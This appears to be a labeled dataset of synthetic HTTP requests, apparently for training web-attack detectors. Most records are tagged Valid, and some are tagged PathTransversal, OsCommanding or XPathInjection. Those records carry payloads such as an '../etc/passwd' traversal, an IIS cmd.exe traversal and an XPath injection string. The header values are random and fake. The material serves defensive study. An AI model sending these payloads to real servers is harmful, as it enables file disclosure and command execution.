If-Modified-Since: Wed, 17 Dec 08 01:38:50 GMT
If-Unmodified-Since: Tue, 28 Aug 07 18:17:04 UTC
If-Match: *
If-None-Match: "9_-htGGY-ZI9ZD_nMOaJ"
If-Range: Tue, 19 Sep 06 13:15:13 CET
Max-Forwards: 009
MIME-Version: 8.6
Pragma: 8r=l
Proxy-Authorization: Basic aGVuQXQ0aG86c2xweGg0bmU=
Authorization: Basic TGFxZ2k6eWRoMA==
Range: 92-
Referer: http://www.indEs.be/etatl/Dtzt.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: gqTFwRIQA9 http://www.4sindo.fr
UA-CPU: MIPS
UA-Disp: 472,2226,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.1 www.lspeuP.html, HTTP/3.6 www.napI2nwr.js, HTTP/8.3 www.n6i5ns.jpg
Transfer-Encoding: identity
Upgrade: vtsi/8.4, niogL/5.5, sra/2.0
Warning: 299 www.dnpee.html "si779reU" "Mon, 02 Feb 04 01:33:32 UTC"
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 03021
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37935
Start - Id: 16105
class: Valid
GET /JF0LGuOAtvwtY9/pe4e0tohxe.aspx?fIlaEsamllatcxM=35&5seeoe=zi0dpiuanu%3Dt2&vrZgGC8w=d9o&sstsisinee1=lrsoip&adxChd9u=x5oAntoYoioml&h7=%28wkysa&viintIguusiiM=zfbsaoado-nere&tdcYa1m7eoeAmO=en HTTP/1.1
Host: www.hm1Ai.biz:10794
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-roman;q=0.6, koi8, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 151.153.162.122
Cookie: itssovm9ies=o711ea;8yGtrs=3;hpcx6ta=location
Cookie2: $Version="41"
Date: Mon, 13 Apr 09 16:35:42 GMT
ETag: "VtjnFs4mUC@LOp7sQoB"
Expect: 7e7t=az3te;Nocerre
From: exir@MtsL5edgR.cz
If-Modified-Since: Sun, 21 Feb 10 24:44:36 UTC
If-Unmodified-Since: Mon, 28 May 07 10:39:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 3.0
Pragma: l=bDise
Proxy-Authorization: Basic cmlkZXdlOm9panNpc25y
Authorization: Digest cnonce="etwidrhi"
Range: 303812-992,8-0,-1
Referer: /taodheeo/n87dvahe.ace
TE: trailers,gzip,trailers
Trailer: Referer
User-Agent: endrxgsgc (8cPO.o1hN; 3.O1VUv; evkLt1F)
UA-CPU: StrongARM
UA-Disp: 235,1889,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4520x648
Via: FTP/0.9 www.deir.shtml, eOt/7.1 www.I9ma.jpeg:3353
Transfer-Encoding: oumhl
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16105
Start - Id: 2776
class: Valid
GET /cAzuQnln0VYNKc1/as48Emtfpieebe/0FQdrcp-rGE/ntssbad8/swzr0hFeytH.fiz9Mg2/rehioc9r/aVodD9yYKftj7JSE9k@X/1iR/iloojcrfnW0hasf8el.mdb?mosu5nIts=sff3V7N&SoArwewdfIEbes=tfEcJ1VlLf%40F&msnoywynapkis=zyetovsbojs6rn HTTP/1.1
Host: www.7s2Hcpve0s.ch:1
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 188.5.26.126
Cookie: vie5d=cetn);eei=nnooh/1xe&9;aI=owinntcers5rdaoe3se;Rdeznrnolfp5tq=tcashutdownC;4di5aalno86yn7e=najr5totrsdaudeis;igl0tde4=textermn
Cookie2: $Version="55"
Date: Mon, 13 Aug 07 06:18:01 GMT
ETag: "0_4Ow6kduQ8_8BQzx"
Expect: 8rlgu=eqs8
From: 7nttm@aa4uGahn.st
If-Modified-Since: Wed, 23 Dec 09 08:40:08 UTC
If-Unmodified-Since: Mon, 05 May 08 06:47:46 CET
If-Match: "4Q.7H_-v30NFu1Z5vm5_"
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 5.1
Pragma: eamy=5slIpRo
Proxy-Authorization: Digest realm
Authorization: besjc mw13mAnh=eoume4i
Range: 771-26
Referer: http://heOaed.be/olh5oi.jpeg
TE: gzip;q=0.8,deflate;q=0.1,trailers
Trailer: Warning
User-Agent: eUF3aGm-3 http://www.yitE.com
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 738x004
Via: HTTP/3.8 www.oansoe4r.shtml, HTTP/2.4 15.101.181.123
Transfer-Encoding: deflate
Upgrade: silEs/6.4
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2776
Start - Id: 3111
class: Valid
GET /LZF6VHrm5_uCmochaiframeV/2ey/jGiJ1.R/dropU/esOX294fvG4.pl?imgV_qhDecho=egEP7VbZsbRE&Te=23902083&ioydnUxlcau=rigloedTgdg7f&befe4lmt=ultedR5nrog&S9NUaro_Jos=eetB&dolleoiuysOl6=o&2Scidsywtce=i6g HTTP/1.0
Host: 48.66.243.147
Connection: oewd
Accept: text/xml, application/*
Accept-Charset: cp-932;q=0.3, x-mac-arabic, euc-tw;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=0226
Client-ip: 166.58.131.193
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="53"
Date: Sun, 24 Jan 10 11:23:07 CET
ETag: "4Ll0_82lrVtR2rBjtA"
Expect: uC40=ureig
From: hqalovee@tsee.be
If-Modified-Since: Thu, 02 Jul 09 17:54:57 CET
If-Unmodified-Since: Fri, 10 Jun 05 24:48:04 UTC
If-Match: "glP6@51npR_Y9kSy2LNR"
If-None-Match: *
If-Range: "_DoDx6LPFdvaehrN"
Max-Forwards: 061
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic aWJlNmx1emQ6U29sMW1h
Range: 331758-,23-
Referer: /rTst/ysbor.swf
TE: gzip;q=0.4
Trailer: Upgrade
User-Agent: fo3GnrBmnhnDfnegs
UA-CPU: 68000
UA-Disp: 3889,3647,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 3082x5034
Via: unenx/6.8 www.wEew.htm, HTTP/9.8 www.ifTns6o.js
Transfer-Encoding: compress
Upgrade: 6te/4.3, reiog/2.9, ctnoo0/7.3, hxHaad/5.5, ldtkhe/8.4
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 50270
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3111
Start - Id: 36343
class: PathTransversal
GET /vreSumcm/iitp0qEttterfh5.dll?EuWt2HJselectMtDw=sadjcyhu&yiHz=8026205&otlp=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&h0=tuIfostetHfmsmqe&kshne=nohtv1awp-faaidroplzhe%40&g0qztatol=sg%5Dr HTTP/1.1
Host: www.Trnn.com:61
Connection: t67ja
Accept: video/*;q=0.5, audio/*
Accept-Charset: x-mac-arabic, x-mac-roman;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=33
Client-ip: 59.25.255.93
Cookie: e1nndsnh7gein=9srg46_RRT;laobjectn_9kZ2mN=ntcar;achrqYstdsoeais=3841;rnadhtAgetzen=oTrHahnaOarEsi;obghuvwcEftL=nne
Cookie2: $Version="42"
Date: Sat, 21 Oct 06 06:01:19 UTC
ETag: W/"wczlowywPCBmVlM"
Expect: 100-continue
From: emtam@9Sfe.uk
If-Modified-Since: Sat, 27 May 06 19:44:21 GMT
If-Match: "_IIId4.7kmnHjG70I"
If-None-Match: *
If-Range: Wed, 24 Aug 05 16:20:52 UTC
Max-Forwards: 86
MIME-Version: 0.4
Pragma: j='sbtemria'
Proxy-Authorization: Digest cnonce="47it"
Range: 6-770122
Referer: /Reseea/taeerldl/hr7s/6tneaw.png
Trailer: From
User-Agent: tnmdee (rDG0cQRBKJ; axoCAyCLTj)
UA-CPU: x86
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 636x8824
Via: yevfed/6.1 150.195.89.202
Transfer-Encoding: gzip
X-Forwarded-For: 217.52.49.74
----: ------------------------------------

null

End - Id: 36343
Start - Id: 16859
class: Valid
GET /vjmsfM1rewoTpoe/eL@ArYPqvNWzUkW9nf.cfm?k1naanSna=connecttlo&_2ymB3bbin=09631 HTTP/1.1
Host: www.h21d.it:22862
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: rgae-vnfrOatb, eereen-g17;q=0.3, wse-u0nt;q=0.4, menAtSoa-4
Cache-Control: no-cache
Client-ip: 127.221.48.135
Cookie: oeKul=do;zp2lNiivroesrta=5407408;diesjszslonnE=mght4ttInh2;pse3E.=iehct8gblwoe3;oy1aoAids1astts=ese;8jexechNeqH1@f=827088284
Cookie2: $Version="533"
Date: Fri, 21 Sep 07 16:03:56 CET
ETag: "GUs2waZHtgMqsFgO_q"
Expect: 100-continue
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Thu, 18 May 06 08:30:39 CET
If-Unmodified-Since: Sun, 16 Apr 06 05:07:42 GMT
If-Match: *
If-None-Match: *
If-Range: "oUBjI0a2fY8hAeOSynx"
Max-Forwards: 4032
MIME-Version: 8.8
Pragma: ahEu9i='yem'
Proxy-Authorization: Basic aG5laXc6ZGxxblU=
Authorization: swtiiu eooot=epOqo
Range: -2762
Referer: /Oyg8eRwW/Qwaltie/msce/geoeqt3.mp3
TE: trailers,trailers,trailers
Trailer: Trailer
User-Agent: dd6ss/5.5
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0532x1830
Via: HTTP/1.8 112.47.233.27, 2myo3l/8.4 230.182.136.85, HTTP/4.9 www.suti.png
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 926077
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16859
Start - Id: 18461
class: Valid
GET /csnjT5mc/GdigQs/8zWm/L3YxincludeK.Jy/itaoes/8U4oJgoHfHdT6Phk/qieaoldsr2joko.shtml? HTTP/1.1
Host: 240.118.254.85:94
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: windows-1250, windows-1253;q=0.4, iso-10646-ucs-2;q=0.9, x-mac-japanese;q=0.4, utf-7;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: 1kctohe-oeh7, in9-5scw;q=0.3
Cache-Control: Lrih=xr
Client-ip: 223.195.59.109
Cookie: R3Rkclsihieist=3LOQ;tbzatee=57;rmaiossdkcTuO=57;1nacnr0eh=55507248;iiusrh5wz=ttgterwetiusn
Cookie2: $Version="6"
Date: Thu, 20 Nov 08 04:30:50 CET
ETag: W/"xrVeM_DsdLGIeOWkDNiQ"
Expect: 100-continue
From: stiq@titznIesy.de
If-Modified-Since: Sun, 27 Jun 04 07:11:29 CET
If-Unmodified-Since: Thu, 04 Feb 10 17:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: "rvqFv15fdwTbnUGdz"
Max-Forwards: 9923
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: mdtspE NmaFtM=lagctp
Authorization: Basic ZWhjbWNpOnNkbHkzam5u
Range: 72-79
Referer: http://mrY6.uk/rewusAf/saomh/ies5dii/Ninu/ahiaeeic.zip
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.5 (X11; U; Solaris 2.3; ci-Ak; rv:9.4.7) Gecko/50975546
UA-CPU: PowerPC
UA-Disp: 454,2139,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 934x751
Via: g0eN/9.3 224.175.144.214
Transfer-Encoding: gre0
Upgrade: emlqe/4.7, 0ijpy/5.5, 2ee/6.9
Warning: 975 www.T3nto.html "tmezsAhMh3o5uamnt0or" 
X-Forwarded-For: 110.33.123.65
X-Serial-Number: 25635510975973984373
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18461
Start - Id: 201
class: Valid
GET /Sutf/ede8srern6owbeu/n7/0esaeeIhairdJ.cgi?SaiuinMbEdari=fa4yeiipefa&sgieyjtkamy7o=k+eix%25&.iY-umochadxY=364709&a4tiostvfoGaex=43&oktlrsdebdrcke=7933&3tuvoeeA=roae&ct5b1veZnepxhn=85396929&tTfpaobihnai0O=7144788540&drgc4i1adOsI6jo=eeathS4pnt6&lS0Eimi=pec&U0rc=1&ialieideGet=227 HTTP/1.1
Host: www.o5thev.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.2
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 217.52.131.115
Cookie: qemnoe7ttoebort=agqEkrdenngyaq;hdln9thn=?io4uprn;KkJCHG8Finsert=thtoe6o tea
Cookie2: $Version="60"
Date: Wed, 28 Sep 05 20:55:08 GMT
ETag: "3N3CXyaIZ5bDjbdk"
Expect: 100-continue
From: dcet@elLtesue.uk
If-Modified-Since: Tue, 09 Mar 04 07:30:28 CET
If-Unmodified-Since: Fri, 27 Jan 06 24:07:52 GMT
If-Match: *
If-None-Match: "@DV_KwhrXm.A6dQo"
If-Range: Mon, 13 Aug 07 02:52:18 CET
Max-Forwards: 995
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: yghn ueizw2es=eeel
Authorization: Digest uri=http://vnhtylrb.st/ifpmaoe/howe.cfm
Range: 534828-
Referer: /mdef/5Uiomah/5esugsof/aiye/yjicrri.jsp
TE: chunked;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/4.9 (Windows; U; Win 9x 3.8; ud-ih; rv:6.6.1) Gecko/52822450
UA-CPU: StrongARM
UA-Disp: 021,047,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4314x599
Via: HTTP/6.5 191.174.196.218, neah/6.2 www.tglyrmm.png, HTTP/9.2 www.xouyd.css
Transfer-Encoding: deflate
Upgrade: ahei/7.4, ea4eeh/0.5, diptss/4.0, ensoe3/8.3
Warning: 087 www.ltOnotae.shtml:31935 "iiEllyneteg5u" "Thu, 28 May 09 07:54:06 GMT"
X-Forwarded-For: 209.28.165.11
X-Serial-Number: 3449007851195603
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 201
Start - Id: 11882
class: Valid
GET /YTYJHFsk/sFeqQjYAaC21X/07ek35mc@/bttetnxgstycj/eZf9l7QSE/uz93likeJJVgU.gif?Ye=g%7Es-&node-htpassb1like-uX6=jqRAP660uxx&t8oc=t3df44&5oplotfol4eh4t=n&arnI=u%2Bnt%29s4ntojHhy65k&fmoicoUw=6481327621&ustyy=idnrlms&aw5r=99132531&bmooehtnMOtotl=t0eq_DXUkkF&lNlo=triEtmp7mEnkn&Artosesdsakn=aty HTTP/1.0
Host: www.oeswi.ch:80
Connection: close
Accept: audio/*, text/plain;q=0.7, image/png
Accept-Charset: *
Accept-Encoding: 
Accept-Language: li-grkhi;q=0.6, Ne-yriotxro;q=0.2, cnok-aem, epY-8g0i;q=0.9
Cache-Control: only-if-cached
Client-ip: 229.75.126.33
Cookie: sezhtcedeaok=o35o;ds=a3r;zQ_3=hmt;ans=e 0ay1i sa
Cookie2: $Version="7"
Date: Mon, 15 Aug 05 24:01:36 CET
ETag: "legimXkD5odU3MO1."
Expect: 100-continue
From: letI@hnH5isut.cz
If-Modified-Since: Tue, 26 Jan 10 10:41:01 UTC
If-Unmodified-Since: Wed, 09 Dec 09 02:06:21 CET
If-Match: *
If-None-Match: "BMIbp-oojcp10WGL2R4"
If-Range: "Z6tW1RF12sk6yXL"
Max-Forwards: 234
MIME-Version: 6.8
Pragma: lgf8a='shyxcost'
Proxy-Authorization: Basic dzhlYXM6d3JoQXI=
Authorization: Basic dGV0c2lUbG46QXV0b2k=
Range: -35,-883,-072
Referer: /iai14/dtSlai/hreopal4/yAhtt/zwm1idw.gif
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.5 (compatible; Konqueror/5.6; Win98; atmytcett5; elooets4i; mzityrIe)
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 151x6583
Via: FTP/0.6 www.omtufo.tiff, 6.1 73.68.207.212
Transfer-Encoding: compress
Upgrade: 6tBb5/8.0, exe/8.3
Warning: 371 www.1cmlh.jpg "bnbD" "Tue, 30 Jun 09 11:03:01 CET"
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 11882
Start - Id: 36635
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.0
Host: 107.180.92.131:6912
Connection: keep-alive
Accept: */*
Accept-Charset: koi8, cp-936;q=0.6, hz-gb-2312, windows-1255;q=0.3
Accept-Encoding: *
Accept-Language: vgtrv-Mb, rr2y2se-6silt, N-mr;q=0.3
Cache-Control: no-cache
Client-ip: 176.42.238.82
Cookie: ileDrge=os 
Date: Thu, 05 Feb 04 23:51:34 UTC
ETag: W/"qtYlp.tl8JMop-y6g"
Expect: 100-continue
If-Modified-Since: Sat, 04 Mar 06 02:16:31 UTC
If-Match: *
If-None-Match: "BnYspWJt-nfYPwOHeGX"
If-Range: "weAXubksETS8uuD"
Max-Forwards: 2434
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM cmNlcGdhbnd0b29yM25lYWlvZWVFYWQyYXJtWXNlbkRhbXJqaDRsaWV3
Referer: /ohdgn4s/emq8edee/od5e2aod.mspx
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/9.6 (compatible; MSIE 3.5; Linux i586; 8lknt)
UA-Pixels: 262x6373
Via: 0.2 218.134.86.49, 5.4 www.ssUzi.css, HTTP/0.9 199.136.58.98
Transfer-Encoding: deflate
Upgrade: tanoeu/5.3, o1rivx/6.2, nfr/2.4, tnwl/0.9
X-Forwarded-For: 43.56.144.162

null

End - Id: 36635
Start - Id: 27490
class: Valid
GET /tYvG/sAsiafln/rnDslcnefmdEcuo/iaeUC/4ThDneshrel/Fl-CxtermVx/dOoMbow6ngoe.jpeg? HTTP/1.0
Host: www.batt.cz
Connection: keep-alive
Accept: image/*;q=0.6, application/x-tar;q=0.7
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic;q=0.9, iso-8859-2;q=0.8
Accept-Encoding: 
Accept-Language: hoP-T
Cache-Control: no-cache
Client-ip: 173.233.230.241
Cookie: stnyesn8sno=s(h7;nA=mochawgetcir9i02feohren;vq=n
Cookie2: $Version="24"
Date: Sun, 13 Mar 05 06:01:51 UTC
ETag: W/"TsBZYmKSa_fY1-vQt0qN"
Expect: 100-continue
From: tirio@Wnps.be
If-Modified-Since: Wed, 27 Jan 10 11:47:27 UTC
If-Unmodified-Since: Tue, 07 Dec 04 24:49:28 UTC
If-Match: *
If-None-Match: "1dvpeozy.Wo9n9EI"
If-Range: *
Max-Forwards: 94
MIME-Version: 4.1
Pragma: nselau='eipEI'
Proxy-Authorization: NTLM VnBlbkE1ZTF5ZGY3bk5hcmlncjlhYnJhbW56NGxlY2lUY3l3VDZk
Authorization: Basic dGlmZ21mbDptZXVuZXRyYw==
Range: 1-2208
Referer: http://ftl4wr.gov/0uceqh.nsf
TE: trailers
Trailer: Expect
User-Agent: mp4TWc1Lq http://www.m4bHe2p.de
UA-CPU: StrongARM
UA-Disp: 3595,0287,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5041x3321
Via: ybyr4/0.7 3.188.213.235, 8.7 178.24.47.56, icl/2.2 www.t06se.html:1
Transfer-Encoding: compress
Upgrade: t2fhdr/9.6
Warning: 705 www.cr0imbe.jpg "pj04agtertdoit" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 1838751121363
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 27490
Start - Id: 3228
class: Valid
GET /gm0ce8deawo9oet4oce6/eGdqeqCtxggK5Tggj/autoexecBW37CQGSyehttpC/AatqvTnfitsn/w9htpassE2YS0hD/aTWtxGuR.n/YDt07esm7F7/atrxTcEtt0if8g.cfm?fopciernkbhdffo=0790&ttujOxtHerh=saoddYfnoaBotDaa&r3Dt09l0nlx=l3d HTTP/1.0
Host: www.rdoeqI.fr
Connection: close
Accept: text/*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: rtmsemEm-igeni;q=0.8, Eg4arva-t;q=0.6, fkio-eoe, rd-t, i-tdenEt6b;q=0.0
Cache-Control: no-transform
Client-ip: 1.220.179.93
Cookie: 2ihAtnebepf=hc7vqsK0GudE;c5maolone=raqh3;hne=tP6bRu2pjo
Cookie2: $Version="87"
Date: Sat, 05 Dec 09 23:28:38 GMT
ETag: "7tVLI_91F1BMepnSIE"
Expect: zashtu
From: ee5cc9@atzl3njm.com
If-Modified-Since: Mon, 02 Nov 09 11:49:55 GMT
If-Unmodified-Since: Sun, 28 Jan 07 20:50:02 CET
If-Match: "uZsN@8RT71bFShAS7Pxy"
If-None-Match: "U4_36O4hnFNUpEsDdcO"
If-Range: Sun, 09 Sep 07 04:04:08 GMT
Max-Forwards: 229
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Digest realm
Range: 82-228963,737536-47
Referer: /lkotkaas/dorae7e/taoeen.pl
TE: trailers,trailers
Trailer: Host
User-Agent: h0X5_owL0 http://www.lohqd.it
UA-CPU: MIPS
UA-Disp: 531,159,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 796x812
Via: 1.8 www.nlchurr.tiff, FTP/1.3 21.80.28.123, 5.4 249.131.46.116
Transfer-Encoding: identity
Upgrade: hlt2h/0.4, aiEa/0.7
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3228
Start - Id: 49651
class: XPathInjection
GET /i129ADCQ/iAtez2c@window.openbScM/Vz/9b@JZ1Jo5Qt0F/rRboot.inixp__I.cfm?wIL3A=dgGWtzyLKA&aikstentaopdTee=828&ettADeideixon=oI9ADgOpIk.&eHpn2i=%2FU&urfereusauoq=hN&aawt7i8s=ert4%27%5D+++++%7C+++++P++%7C+++%2F%2Fuser%5B+name%2Ftext%28++%29++%3D++%27ewuae&k94R2=apejymdieheahrih9&ncqapriodhd=eispgDVHX HTTP/1.1
Host: 73.249.193.198
Connection: close
Accept: video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: Ioe-tqxnriit;q=0.3, plxa-dtwrhi, h4-car;q=0.0, s-mhmpcsli
Cache-Control: max-stale
Client-ip: 108.249.101.218
Cookie: einwa1ofmLl=0;caecahonhe5=4mpsz;ueegtk1oFeastt=y1th4lS1;7s=eq0ie
Date: Tue, 11 Jul 06 22:02:33 UTC
ETag: "XG5vP6R7j2LObHQwr_qp"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Sat, 09 Jun 07 06:29:22 CET
If-Unmodified-Since: Fri, 18 Jan 08 24:43:53 UTC
If-Match: "IN7EhMwQ.ARu3vM"
If-None-Match: "PL_MBME4QS8bVxf"
If-Range: "5DN.9KRQd06vJSv7rfrY"
Max-Forwards: 5921
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: 3amlie etssuAeh=1oxgre
Authorization: Digest uri=http://mna4agle.it/ahffsu/so9n/rtiEyi0e/miafb/toahlqn.pdf
Range: 4-,650706-6695,41362-
Referer: http://www.i7Rw.uk/gcfo/eiei/lEdjhql/no5a.bin
TE: trailers,gzip;q=0.6
Trailer: Via
User-Agent: Mozilla/3.2 (Machintosh; U; PPC Mac OS X 7.0; ar-vx; rv:4.0.6) Gecko/99131395
UA-CPU: PowerPC
UA-OS: Windows NT
Via: tit3a/4.8 188.75.119.134
Transfer-Encoding: identity
Upgrade: nn7ooi/9.0
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 6227960024150
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49651
Start - Id: 28519
class: Valid
GET /natew4fetOch2/iwk@v/B73updatezservicesfI/9fTHHW-7Xnrooc/hJTNy0I0e/rySIv3pjcz7.shtml?oilneamce4Nadai=aehttp1w&oehefto6A4ti=5&2Oihnrlbtto=edu%25ucE-+py&H0mtr=rT9mC4Gn_s1U&isesoLaem3vtc=%27kbinnEl%28%28+xtermi&gidcdi9Ehnre=8R%401OCc.m&deceheiere=ifjb&oi=86937&G8R1GAlcmdm=ankZ&0e=3&eYjh8das6mtlu=Ttedt43ethWewetz&OuDDIBZxmlYlinkMO=aT&ytyitoeyscyt=apy32rareess HTTP/1.0
Host: 91.94.105.37:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-turkish;q=0.6
Accept-Encoding: *
Accept-Language: e-rii6avwe, eb-ss;q=0.0, nd-Uer1or, Mn4mpue-tFhatrd
Cache-Control: only-if-cached
Client-ip: 86.240.167.85
Cookie: da4=tftsilnXewc;aaameit=abinieool
Cookie2: $Version="3"
Date: Mon, 14 Feb 05 18:18:53 CET
ETag: W/"sbVckj4MZ.duV1X1XVm9"
Expect: 100-continue
From: tlmuhe6G@iElga.org
If-Modified-Since: Thu, 25 Jan 07 17:36:12 CET
If-Unmodified-Since: Wed, 16 Nov 05 17:01:56 GMT
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: *
If-Range: Sat, 09 Sep 06 24:32:13 CET
Max-Forwards: 945
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YW9zYWM2bmVhdW0yZXN4aGVuaXF2cHM4bDM2ZWRlcjBlbG4=
Authorization: alNalt assbes=ettr12
Range: 7-93,534-66746
Referer: http://www.Eljo.st/khre02.doc
TE: gzip;q=0.5,trailers
Trailer: Cache-Control
User-Agent: y5hY62YIe9 http://www.ri6aiht.gov
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 3.8 www.J1m8.tiff
Transfer-Encoding: eeqema; mLnsh=o4dggaeS
Upgrade: ssc6/7.2
Warning: 910 www.legsia.css:7 "totaiqAI" "Tue, 27 Dec 05 09:24:47 CET"
X-Forwarded-For: 32.243.80.201
X-Serial-Number: 42227598156350545676
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28519
Start - Id: 45536
class: PathTransversal
GET /oe/dPpKW_L9/si8raiadeibna/soNeHionizrx1/h3QHdAvjy.QRLKE/tCEOOl350EOBKO/jLYE_e7pzaiframei.css?aa=p%3A%5Cautoexec.bat HTTP/1.0
Host: www.1ibel0a.com:413
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.0, windows-1255;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: ronol3nu='oeo'
Client-ip: 32.239.48.70
Cookie: nbHn=wqe;YYzyuou_tPpf=cwbuse;Rk2deletestyleE0c7Jkf= leg
Cookie2: $Version="20"
Date: Thu, 05 Jan 06 17:57:05 GMT
ETag: "Ze@vy62aYSghPKIo"
Expect: 100-continue
From: muibee@Egtuem.uk
If-Modified-Since: Thu, 23 Apr 09 06:35:52 UTC
If-Unmodified-Since: Fri, 28 Aug 09 09:08:27 GMT
If-Match: "ydsfSejSRfDbM_XoxlYx"
If-None-Match: "S@3pqppy8N3ysEXy1"
If-Range: "NobdZfNtglYhDQNP"
Max-Forwards: 359
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: enba eOsywabt=bulrtl
Authorization: Basic ZW5wSDp0c2hh
Range: 903-3,3-4324,-8
Referer: http://teedeEB.com/XioCfc.php3
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/7.1 (Windows; U; WinNT 2.1; Kn-ew; rv:8.6.5) Gecko/78358959
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 589x0586
Via: 3.6 187.66.182.212
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45536
Start - Id: 11977
class: Valid
